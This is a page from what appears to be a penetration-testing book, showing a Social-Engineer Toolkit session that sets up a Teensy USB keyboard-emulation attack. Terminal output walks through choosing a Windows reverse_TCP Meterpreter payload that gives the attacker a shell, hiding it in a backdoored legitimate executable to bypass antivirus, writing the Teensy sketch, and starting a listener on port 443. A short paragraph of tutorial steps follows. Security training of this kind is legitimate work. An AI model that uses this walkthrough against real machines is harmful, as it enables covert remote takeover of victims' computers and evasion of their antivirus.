background image

158

Chapter 10

Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

1. Powershell HTTP GET MSF Payload

 2. WSCRIPT HTTP GET MSF Payload

3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 

2

 Do you want to create a payload and listener yes or no: 

yes

What payload do you want to generate:

Name:                                      Description:

. . . SNIP . . .

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

 Enter choice (hit enter for default):

 

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

. . . SNIP . . .

16. Backdoored Executable (BEST)

 Enter your choice (enter for default):

 

[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable

[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.

[*] Launching MSF Listener...
resource (src/program_junk/meta_config)> 

exploit -j

[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

To begin setting up this attack, choose 

Teensy USB HID Attack Vector 

 

from the main menu, and then choose 

WSCRIPT HTTP GET MSF Payload 

. Then 

tell SET to set up a payload and listener  , selecting the default Meterpreter 
payload   and encoding method  .